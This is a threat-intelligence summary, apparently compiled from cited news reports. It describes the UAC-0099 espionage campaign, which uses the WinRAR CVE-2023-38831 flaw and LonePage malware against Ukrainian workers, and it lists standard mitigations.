UAC-0099 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11], a threat actor [2] [4] [5] [6] [8] [9] [10] [11], has been targeting Ukrainian workers at organizations based outside of Ukraine since 2022. They exploit a high-risk vulnerability in WinRAR software [5] [9] [10], known as CVE-2023-38831, to execute arbitrary code when a user attempts to view a file within a ZIP archive [3]. Despite the vulnerability being patched, many users remain vulnerable.
Description
UAC-0099 employs three different infection methods [6] [8], including self-extracting archives and booby-trapped ZIP files [1] [2] [4] [6] [10]. They deceive victims into opening seemingly harmless ZIP files [7], which then execute PowerShell with malicious content [7]. They also use fabricated court summons to trick victims into executing malicious files [7]. The attacks begin with phishing emails containing file attachments, leading to the installation of the LonePage malware. LonePage establishes a concealed PowerShell process that communicates with a predefined URL to retrieve a text file [7]. This group is also known for using the LonePage malware to communicate with a command-and-control server and download additional payloads, such as keyloggers [11], stealers [3] [6] [8] [11], and screenshot malware [6] [8] [11].
UAC-0099 has been conducting targeted cyber-espionage operations in Ukraine [3], gaining unauthorized remote access to compromised systems [3]. They distribute malicious files via email and messengers [3], infecting systems with LONEPAGE malware [3]. The hackers also download other malicious strains and compromise privileged accounts [3]. Organizations and users are advised to restrict certain legitimate components [3], monitor network traffic [3], scan for malware [3], change compromised passwords [3], and apply security patches and updates [3].
Deep Instinct [1] [5] [6] [8] [9] [10], a cybersecurity firm [1] [5] [9], has linked UAC-0099 to these attacks [9]. UAC-0099 was first identified by CERT-UA in June 2023 [6] [8], with attacks aimed at state organizations and media entities for espionage purposes [6] [8]. The attack chains involve phishing messages with HTA [6] [8] [10] [11], RAR [6] [8] [10] [11], and LNK file attachments [6] [8] [10] [11], leading to the deployment of LONEPAGE malware [6] [8] [10] [11]. This Visual Basic Script (VBS) malware can communicate with a command-and-control server to retrieve additional payloads like keyloggers [6], stealers [3] [6] [8] [11], and screenshot malware [6] [8] [11]. Deep Instinct’s analysis reveals that UAC-0099 employs three different infection methods [6] [8], including HTA attachments [4] [6] [8] [10], self-extracting (SFX) archives [1] [2] [4] [6] [8] [10] [11], and booby-trapped ZIP files [1] [4] [6] [10]. The latter two exploit the WinRAR vulnerability (CVE-2023-38831) to distribute LONEPAGE [6] [10]. The attacks rely on PowerShell and the creation of a scheduled task that executes a VBS file [6] [8] [10] [11].
Conclusion
These targeted cyber-espionage operations by UAC-0099 have significant impacts on compromised systems and organizations. To mitigate the risks, it is crucial for organizations and users to implement security measures such as restricting certain components, monitoring network traffic [3], scanning for malware [3], changing compromised passwords [3], and applying security patches and updates [3]. The identification of UAC-0099 by CERT-UA and the analysis conducted by Deep Instinct provide valuable insights into the methods and vulnerabilities exploited by this threat actor. It is essential for organizations and cybersecurity professionals to stay vigilant and adapt their defenses to counter future attacks.
References
[1] https://healsecurity.com/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware/
[2] https://gridinsoft.com/blogs/uac-0099-ukrainian-companies-lonepage/
[3] https://iaqaba.com/winrar-flaw-exploited-by-uac-0099-hackers-to-spy-on-ukrainian-firms/
[4] https://cybermaterial.com/ukrainian-firms-targeted-by-winrar-exploit/
[5] https://gixtools.net/2023/12/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware/
[6] https://ciso2ciso.com/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware-sourcethehackernews-com/
[7] https://www.hackread.com/uac-0099-hackers-winrar-flaw-cyberattack-ukraine/
[8] https://mrhacker.co/vulnerabilities/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware
[9] https://cyber.vumetric.com/security-news/2023/12/22/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware/
[10] https://vulnera.com/newswire/uac-0099-exploits-winrar-vulnerability-to-launch-lonepage-malware-attacks-on-ukrainian-firms/
[11] https://thehackernews.com/2023/12/uac-0099-using-winrar-exploit-to-target.html
